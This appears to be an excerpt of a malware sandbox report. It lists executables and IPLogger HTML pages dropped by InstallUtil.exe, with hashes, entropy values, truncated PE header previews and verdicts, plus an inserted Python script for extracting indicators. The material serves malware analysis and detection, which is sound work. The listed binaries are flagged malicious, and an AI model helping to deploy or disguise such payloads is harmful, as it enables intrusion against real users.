Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.76847378561161
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:rnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:WWqlkLESgCRE/vhOjb05efd6e/oXHA
                                                                                                                                                                                                                                MD5:8297ED4155F5D7C649F090DD34135CFD
                                                                                                                                                                                                                                SHA1:C6A61E7CE69E1196C87B3F34139CEF3FA70A97C7
                                                                                                                                                                                                                                SHA-256:BB3EE419CCCA57D4AD34E80C5218F7F45B2ACEC451CA9E2C7083F18D0E74F757
                                                                                                                                                                                                                                SHA-512:AA001D8B620209319F30CA9034FC3D03550F884EA6761A22E43E3221566BE6B612E1CEA4689494AE2E52400E3AF4628952327FBD86A14D191100DE9B7DD776FC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....q.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
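The records above carry everything a responder needs to act on this sample, but only as key:value text. The following Python script is an added example, not part of the Joe Sandbox report: it parses records in the report's own layout into per-file dicts, pulls out the SHA-256 values of every entry marked Malicious:true for a blocklist or hunt query, recomputes the 8-bit Shannon entropy that the "Entropy (8bit)" field reports, and checks a raw file header for the UPX0/UPX1 section names that appear in the preview of the UPX-compressed drop. The two sample records are constructed from values copied from the entries above; the 7.99 cut-off for the "Encrypted" flag is an assumption that merely fits the values on this page (7.9818 is flagged false, 7.9948 true), and the UPX check is a section-name heuristic, not a packer identification.

```python
"""Added example (not from the Joe Sandbox report): turn dropped-file records
into indicators and reproduce the derived fields a practitioner checks by hand."""
import math
from collections import Counter

# Constructed sample in the report's "Key:Value" layout, values copied from
# the entries above (the report does not show the dropped paths).
SAMPLE_RECORDS = """\
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.76847378561161
Encrypted:false
MD5:8297ED4155F5D7C649F090DD34135CFD
SHA-256:BB3EE419CCCA57D4AD34E80C5218F7F45B2ACEC451CA9E2C7083F18D0E74F757
Malicious:true
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
MD5:5B423612B36CDE7F2745455C5DD82577
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
Malicious:false
"""


def parse_records(text):
    """Split report text into one dict per dropped file.
    A new record starts at every 'Process:' line; the first ':' separates
    key from value so Windows paths containing ':' survive intact."""
    records = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        key, value = key.strip(), value.strip()
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def malicious_sha256(records):
    """Sorted, deduplicated SHA-256 list of every record marked Malicious:true."""
    return sorted({r["SHA-256"].lower() for r in records
                   if r.get("Malicious") == "true" and "SHA-256" in r})


def shannon_entropy_8bit(data):
    """Entropy in bits per byte, the quantity 'Entropy (8bit)' reports:
    0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


# Assumed cut-off for the report's 'Encrypted' flag. It is not documented on
# this page; 7.99 is simply consistent with the flagged and unflagged values.
ENCRYPTED_THRESHOLD = 7.99


def looks_encrypted(entropy):
    """Apply the assumed threshold: packed/encrypted payloads sit near 8.0."""
    return entropy > ENCRYPTED_THRESHOLD


def looks_upx_packed(header):
    """Heuristic only: stock UPX names its sections UPX0/UPX1, which is what
    the preview of the UPX-compressed drop shows. Renamed sections evade it."""
    head = header[:1024]
    return b"UPX0" in head and b"UPX1" in head


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    print("malicious SHA-256:", malicious_sha256(recs))
    print("entropy of 1024 zero bytes:", shannon_entropy_8bit(bytes(1024)))
    print("entropy of bytes 0..255:   ", shannon_entropy_8bit(bytes(range(256))))
    print("UPX section names present: ",
          looks_upx_packed(b"MZ" + b"\x00" * 300 + b"UPX0\x00\x00\x00\x00UPX1"))
```

Feed the script the text of the whole "Dropped Files" section rather than the two constructed records to get the full SHA-256 set; the HTML drops are correctly excluded because the report marks them Malicious:false even though they are written with a .exe name.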
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684773333644035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:jnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:OWqlkLESgCRE/vhOjb05efd6e/oXH+
                                                                                                                                                                                                                                MD5:60E7CBE62953DCC0C073B17903CDD964
                                                                                                                                                                                                                                SHA1:2D3EB136171651062FE0C518354DA606DB3B81A4
                                                                                                                                                                                                                                SHA-256:DD60C708010E249DF01825AEAEB2EE20E8E61696538DEAA9F71DE2E82DFF48F0
                                                                                                                                                                                                                                SHA-512:979A635C9E56909FB504AE2AA3775EFE096DC505EECD1579D4F5EE3AE13DBA7BA9291DDB2A8DACA8589ED8E81D2BB6A81525B4B7743FF89184C43ADCD903CDEE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684776130530935
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:VnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH2:MWqlkLESgCRE/vhOjb05efd6e/oXH2
                                                                                                                                                                                                                                MD5:EF362A02A819074B78817FCE97CDF704
                                                                                                                                                                                                                                SHA1:D5FD2177A91CCCFE24A56D3D2F662B642440D86A
                                                                                                                                                                                                                                SHA-256:EAF3FE1CAB65A7E731534E5B6134F32A7C844BBE14C3712B87FA5900108A1A1D
                                                                                                                                                                                                                                SHA-512:0198C6D3F4D07231641A162A44F754C8DACADB8CDCFFE49E537F3C6A88496C1E519BD2DC7D2D830AA6B1459DBF7FD9C937A283CF536B18C5EC61E5BC30278D42
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....?N-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768477121230768
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:BnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHJ:IWqlkLESgCRE/vhOjb05efd6e/oXHJ
                                                                                                                                                                                                                                MD5:6B0B86FBCD8CE36480951A24F06B16EE
                                                                                                                                                                                                                                SHA1:7790CCEC4F2CDE9E70802743A707C0BED73A139C
                                                                                                                                                                                                                                SHA-256:05F45B7397D13B66D5921B4E13C3C37DA717DC096C349A8AC9A5AACD1DD60D13
